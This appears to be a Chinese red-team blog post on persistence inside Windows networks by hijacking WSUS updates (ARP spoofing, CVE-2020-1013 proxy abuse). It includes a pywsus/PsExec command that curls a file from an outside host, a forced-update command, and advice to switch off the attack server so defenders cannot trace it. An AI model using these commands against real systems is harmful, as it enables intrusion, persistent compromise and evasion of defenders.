在15年的黑帽大会中,Paul Stone 、Alex Chapman 提出了通过劫持Windows Server Update Service(WSUS)并利用中间人攻击,模拟WSUS服务端,在Windows自动更新时执行恶意命令。
大致流程图如下所示:
由于WSUS默认是基于http的,所以我们可以通过脚本伪造一个恶意的WSUS地址。
python pywsus.py -H 0.0.0.0 -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "curl http://www.0-sec.org:8080/0-sec.txt -o c:\0-sec.txt"
并且通过bettercap进行arp欺骗
默认Windows会配备20小时左右定时检查更新,我们也可以通过手动输入命令进行强制更新。
usoclient StartInteractiveScan
当自动更新时,我们可以注入恶意命令。
由CVE-2020-1013引发的思考:
2016年,Steve Breen记录了一个名为“ Hot Potato”的漏洞。简而言之,此漏洞使攻击者可以滥用Windows系统服务来执行HTTP到SMB的中继并提升权限。
我们再参考一下CVE-2020-1013,当调试Windows 10版本的WSUSpect-proxy时,然后发现可以简单地通过设置Internet Explorer的代理为我们控制的主机,进而转发Windows Update流量内容。
在Windows 10计算机成功移植WSUSpect-proxy模块后,我们怀疑这种行为是否可以用于其他目的,例如本地提权,或者执行恶意命令。
假设我们有权限修改本地用户代理,并且Windows Updates使用Internet Explorer设置中配置的代理,那么我们就可以在本地拦截WSUS流量,并且注入恶意代码程序,同时设置Windows更新为每20小时更新一次。
也就是说,这台机子会每20小时就会执行一次我们的恶意命令,且不需要再进行arp欺骗,就可而达到权限维持的目的。
我们可以通过外网起一个恶意的http服务,并且内含恶意代码文件,通过计算好WSUS的更新时间点,在每次更新前开启http服务,使其下载并运行我们的恶意文件。下载结束后关掉http防止蓝队溯源,以此来达到权限维持的目的。
参考链接
https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf
https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf
https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/
https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/
本文始发于微信公众号(零组攻防实验室):【红蓝攻防】红队中的内网权限维持
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论